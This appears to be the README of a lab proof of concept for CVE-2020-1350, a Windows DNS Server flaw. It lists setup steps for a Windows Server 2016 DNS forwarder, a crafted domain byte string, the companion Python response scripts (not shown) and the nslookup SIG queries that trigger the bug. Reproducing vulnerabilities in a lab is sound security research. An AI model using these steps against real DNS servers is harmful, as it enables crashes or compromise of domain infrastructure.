CVE-2020-1350 Proof-of-Concept
- Download Windows Server 2016
- Download a Linux box (a secondary box to run this script)
- Install Active Directory/DNS on Windows Server 2016 (let's say you named your legitimate domain
33y0re.com
) - Have NO DNS records on the Windows 2016 server (yet)
- Create a "forwarder" record on the Windows Server 2016 image with the IP of the Linux box
- Choose your domain (the "attacking" domain)
- Calculate how long it is (e.g.
blah
is 0x4 bytes and.net
is 0x3 bytes) - Set
domain_correct
to\x04blah\03net\x00
- Run
python UDP_Response.py
&python TCP_Response.py
- Run from the Windows Server 2016 Image or Linux Box:
nslookup -type=sig 33y0re.com ACTIVE_DIRECTORY_DNS_SERVER_IP
followed by:nslookup -type=sig 9.MALICIOUS_DOMAIN_FROM_LINUX_BOX_SCRIPT ACTIVE_DIRECTORY_DNS_SERVER_IP